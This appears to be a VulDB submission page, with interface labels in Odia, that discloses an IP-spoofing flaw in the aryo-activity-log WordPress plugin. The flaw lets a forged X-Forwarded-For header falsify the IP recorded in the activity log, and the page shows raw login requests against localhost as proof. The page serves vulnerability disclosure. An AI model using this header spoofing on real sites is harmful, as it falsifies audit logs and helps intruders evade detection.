ଜମା କରନ୍ତୁ #50744: Http Header Injection in aryo-activity-logସୂଚନା

ଶୀର୍ଷକHttp Header Injection in aryo-activity-log
ବର୍ଣ୍ଣନାhttp header injection vulnerability in aryo-activity-log wordpress plugin that could be manipulate request ip with add x-forwarded-for 1. install aryo-activity-log wordpress plugin https://wordpress.org/plugins/aryo-activity-log/ 2. create login request like that POST /wp-login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost Connection: close Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1 3. add X-Forwarded-For for ip spoofind in activity log POST /wp-login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost X-Forwarded-For: x.x.x.x Connection: close Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1 4. navigate to activity log POC: https://drive.google.com/file/d/1x-pgK3_-uS7NWfkEt_tk4Wc9FhXk-pYX/view?usp=sharing https://drive.google.com/file/d/1YNOLomPC95rRvtk0topUhStVIa7Y8lcq/view?usp=sharing
ଉପଭୋକ୍ତା
 rezaduty (UID 10530)
ଦାଖଲ11/03/2022 11:46 AM (3 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର11/11/2022 08:06 AM (8 days later)
ସ୍ଥିତିଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି213448 [Activity Log Plugin ଅନ୍ WordPress HTTP Header X-Forwarded-For ବିସ୍ତାରିତ ଅଧିକାର]
ପଏଣ୍ଟ17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!